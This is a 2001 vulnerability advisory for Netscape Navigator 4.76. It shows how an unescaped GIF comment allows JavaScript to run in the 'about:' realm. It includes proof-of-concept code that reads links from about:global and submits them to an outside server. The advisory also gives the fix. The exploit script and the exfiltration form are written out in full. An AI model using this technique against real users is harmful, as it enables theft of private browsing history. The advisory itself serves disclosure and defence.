Product: Netscape Navigator/Communicator
Tested on: 4.76 (on Linux and Win98/NT)
Vendor Contact: Reported 2001-03-22
{ Problem
}--------------------------------------------------------
Overview:
The Netscape browser does not escape the gif file
comment in the
image information page. This allows javascript
execution in the
"about:" protocol and can for example be used to
upload the
History (about:global) to a webserver.
Detail:
Netscape does not allow javascript to access documents
from
a different domain. This stops a javascript from one
domain
that tries to mess around with login forms/private
data from other
domain. The following error message is shown
"access disallowed from scripts at <javascriptdomain>
to documents
at another domain."
Now there is the protocol "about:" that is used
for some special tasks.
about: - shows Netscape version and copyrights
about:blank - shows a blank document
about:config - shows Browser configuration.
about:global - shows Information about the Netscape
global history
about:<url> - shows Information about the
specified url
β¦
There are some other about: documents (try grepping
the netscape binary).
about:global is very interesting since all visited
documents are
listed there. So I tried to find a way to access this
information.
I created a frameset with 2 frames. The first Frame
(called foo)
contains about:global. Using <frame
src="about:global">,
<meta http-equiv="refresh" content="10;
URL=about:global"> or
document.location.href="about.global"; for setting
this url did not
work. So I used the following trick to make it work:
<base href="about:">
<form action="global" name="loadhistory">
<input type="submit">
</form>
<script language="javascript">
document.loadhistory.submit();
</script>
My intention is that the second frame (called bar)
grabs 10 urls
in the first frame using javascript and sends them to
the server.
Accessing parent.frames["foo"].document.links does not
work since
foo is displaying an about: document and bar is a
normal http document:
"access disallowed from scripts at blah to
documentsβ¦"
So I tried to find a way to start a javascript within
an
about: document. about:<someurl> comes into mind since
there are
a lot server specified values.
First I tried to inject javascript using the url of
the script.
But since this url is encoded (space => %20 etc.)
there is no way
in. Modifying the Content-Type (File MIME Type) did
not work
either because Netscape opens a "Save asβ¦" window
when
supplying an unknown mimetype.
Then I remembered that Netscape shows the comment
included in
gif files. A quick test showed that the comment is not
escaped.
So Javascript in gif comments is executed in the
about: realm.
This means that this script can then access the
content of
about:global. nice.
The following script included in the comment reads 10
urls in
the about:global frame (foo), stores them in the form
and finally
submits this form.
<form action=http://bla/ns476history.php
target=_parent name=s method=get>
<input name=u>
</form>
<script>
f=parent.frames["foo"].document;
l="";
for(i=0;i<10;i++)
l+=f.links[i]+"|";
document.s.u.value=l;
document.s.submit();
</script>
The server has 10 urls of about:global urls now.
Accessing about:config should be possible too, but
I did not try it.
{ Solution
}--------------------------------------------------------
Disable Javascript
or
Upgrade to 4.77
{ Exploit
}---------------------------------------------------------
attached
or
http://dividuum.de/security/netscape/
Regards,
Florian Wesch <[email protected]>
http://dividuum.de